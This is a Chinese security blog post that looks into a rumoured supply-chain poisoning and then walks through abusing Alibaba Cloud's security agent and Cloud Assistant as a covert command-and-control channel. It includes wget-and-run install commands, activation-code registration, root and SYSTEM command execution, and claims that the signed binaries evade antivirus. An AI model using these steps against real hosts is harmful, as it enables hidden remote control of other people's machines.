免责声明

笔者一边刷着微步一边嗦着螺丝粉，突然小队群里跳出一串转发信息，“用友被打了吗，官网补丁可能是供应链投毒？”

老丁：一眼假，F12一按开始编故事是吧

零神：我觉得很可能啊，说是样本里面是安骑士的安装包，还有安装方法。

机智的我大脑飞速的旋转，一想事情不简单，安骑士怎么就上线了。紧接着辟谣信息就来了。

但是安骑士上线这绝活我怎么可能不会？

云安全中心是一个实时识别、分析、预警安全威胁的服务器主机安全管理系统，通过防勒索、漏洞扫描修复、防病毒、防篡改、合规检查等安全能力，帮助用户实现威胁检测、响应、溯源的自动化安全运营闭环，保护云上主机、本地服务器和容器安全，并满足监管合规要求，简化来说类似于edr。

在攻防角度上，云安全中心可以给我们提供一个自带阿里云证书以及可信域名的一个远控形式，我称之为天然C2。

官方文档描述的安装命令在

云安全管理中心->系统配置->功能设置->客户端

该链接适用于单个云主机，如果想要批量安装agent可通过新增安装命令，生成镜像去批量安装

填写具体的信息会生成一个链接。

主要差异为注册码，也就相当于agent匹配注册码->接入云安全中心

在linux中操作，通过命令可直接安装agent

wget "https://aegis.alicdn.com/download/install/2.0/linux/AliAqsInstall.sh" && chmod +x AliAqsInstall.sh && ./AliAqsInstall.sh  -k=xxx

安装过程中会自动卸载老的agent（这个设定是不是能直接让原来的安全中心断连）

安装完成后可以看到云安全中心中多了一台机器

接下来我们可以对该机器进行运维

进入运维监控，如果未安装云助手需要安装云助手，点击一键安装即可，云助手为阿里云原生打造的自动化运维工具，下面会详细描述。

安装完云助手可查看到我们的实例

可以进行远程登陆（普通用户权限）

也可以远程执行命令(root权限)

云助手是专为云服务器ECS打造的原生自动化运维工具，通过免密码、免登录、无需使用跳板机的形式，在ECS实例上实现批量运维、执行命令（Shell、PowerShell、Bat等）和发送文件等操作。典型的使用场景包括：安装卸载软件、启动或停止服务、分发配置文件和执行一般的命令（或脚本）等。

Alibaba Cloud LinuxCentOS 6/7/8及更高版本CoreOSDebian 8/9/10及更高版本OpenSUSERedHat 5/6/7及更高版本SUSE Linux Enterprise Server 11/12/15及更高版本Ubuntu 12/14/16/18及更高版本Window Server 2012/2016/2019及更高

由于阿里云在云助手中添加了针对混合云的场景的解决方案，所以当服务器不属于官方ecs时也可以加入云助手，于是我们获得了一个集Linux和windows于一体的天然官方远控C2，而且不用考虑免杀等情况，下面会演示一些对于windows和linux通用场景下的创建注册云助手。

• 比起常规C2的缺点

1、无法通过其他技术手段隐藏自己(只有使用匿名阿里云账号)，容易被溯源。

2、文件上传限制大小，无法上传大于32kb的文件。

• 注册码的生成形式

1、最简单的方式是通过网页版的ecs云助手直接创建注册码

2、使用官方cli生成注册码

• Windows场景实战

通过云助手生成注册码

下载云助手exe，自带阿里云签名，可免杀。

在windows机器中以管理员身份运行注册的exe

aliyun_agent_latest_setup.exe /S --register --RegionId="cn-hangzhou" --ActivationCode="a-hz0vqv4hEnQGAfw6F55CzX1TmyXO/" --ActivationId="E5473BA4-8B44-5B1A-B190-74F251794619"

云助手注册成功，可直接命令执行

自带提权至system

• Linux较通用场景

注册码快捷命令的本质是安装云助手，然后通过云助手去注册服务，有时候在严苛的linux环境中无法去进行rpm,deb安装或者是没有wget等命令，于是翻遍了手册得到了一个较为通用的办法。

1、使用binary安装方式

公网地址（最新版本）：

x86版本

wget "https://aliyun-client-assist.oss-accelerate.aliyuncs.com/linux/aliyun_assist_latest_update.zip"

arm版本

wget "https://aliyun-client-assist.oss-accelerate.aliyuncs.com/arm/aliyun_assist_latest_update_arm.zip"

（tips:如果没有wget可直接上传压缩包)

2、解压并安装

unzip -o aliyun_assist_latest_update.zip  -d /usr/local/share/aliyun-assist/chmod a+x /usr/local/share/aliyun-assist/2.2.3.282/update_installbash /usr/local/share/aliyun-assist/2.2.3.349/update_install

3、使用官方cli创建注册码

aliyun ecs CreateActivation --RegionId "cn-shanghai" --TimeToLiveInHours 24

4、使用云助手注册激活码

sudo aliyun-service --register --RegionId "cn-shanghai"     --ActivationCode "a-sh0vqeO2FYTtJtRJEFd/l6+RJpE+P"     --ActivationId "F5E679CB-716D-5BCC-8A49-34342A3C144D"

5、成功上线

总结个毛线，还在炫零食是吧，真想当一辈子猴子？把下面小密圈给我加起来，赶紧给我去学，我螺蛳粉都凉透了，tnnd

原文始发于微信公众号（Lambda小队）：破案！安骑士天然C2？——网传某友供应链投毒事件分析